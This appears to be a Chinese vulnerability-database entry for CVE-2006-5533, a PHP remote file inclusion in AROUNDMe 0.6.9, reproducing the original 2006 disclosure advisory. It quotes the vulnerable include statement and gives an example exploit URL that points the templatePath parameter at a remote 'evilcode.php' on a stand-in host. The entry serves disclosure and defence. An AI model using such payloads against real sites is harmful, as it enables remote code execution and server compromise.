AROUNDMe 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193060 漏洞类型 未知
发布时间 2006-10-26 更新时间 2006-10-26
CVE编号 CVE-2006-5533 CNNVD-ID CNNVD-200610-446
漏洞平台 N/A CVSS评分 5.1
|漏洞来源
https://www.securityfocus.com/bid/87397
https://cxsecurity.com/issue/WLB-2006100148
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-446
|漏洞详情
AROUNDMe0.6.9以及可能更早的版本中存在多个PHP远程文件包含漏洞,在启用register_globals的情况下,远程攻击者可以通过template/barnraiser_01/pol_view.tpl.php和其他不明PHP脚本的templatePath参数包含的URL来执行任意PHP代码。
|漏洞EXP
==============================================
 AROUNDMe 0.6.9 remonte file inclusion
 vendor site: http://barnraiser.org/
 vulnerable versions: 0.6.9 (and possibly older)

discovered by: noislet  ( http://www.noislet.org/ )

vendor informed: 21.10.2006
 published: 22.10.2006
 ==============================================

product info:
 AROUNDMe is the perfect solution for you to bring people together
around shared goals, activities and interests to form a shared
knowledge network.

==============================================

bug details:
 Input passed to the "$templatePath" is not verified before being used
to include files.

required:
 register_globals = On

file:
 pol_view.tpl.php (and others)

buggy code:
 if (isset($poll)) {
 ...
 include $templatePath . "poll_detail.inc.tpl.php";

==============================================

example exploitation:
 http://random.site/aroundme/template/barnraiser_01/pol_view.tpl.php?poll
=1&templatePath=http://example.com/evilcode.php%00

--
 noislet
     page http://www.noislet.org/
|受影响的产品
AROUNDMe AROUNDMe 0.6.9
|参考资料

来源:XF
名称:aroundme-polviewtpl-file-include(29743)
链接:http://xforce.iss.net/xforce/xfdb/29743
来源:BUGTRAQ
名称:20061022AROUNDMe0.6.9remontefileinclusion
链接:http://www.securityfocus.com/archive/1/archive/1/449476/100/0/threaded
来源:SECTRACK
名称:1017106
链接:http://securitytracker.com/id?1017106
来源:FULLDISC
名称:20061022AROUNDMe0.6.9remontefileinclusion
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m=116154841209515&w=2
来源:SREASON
名称:1786
链接:http://securityreason.com/securityalert/1786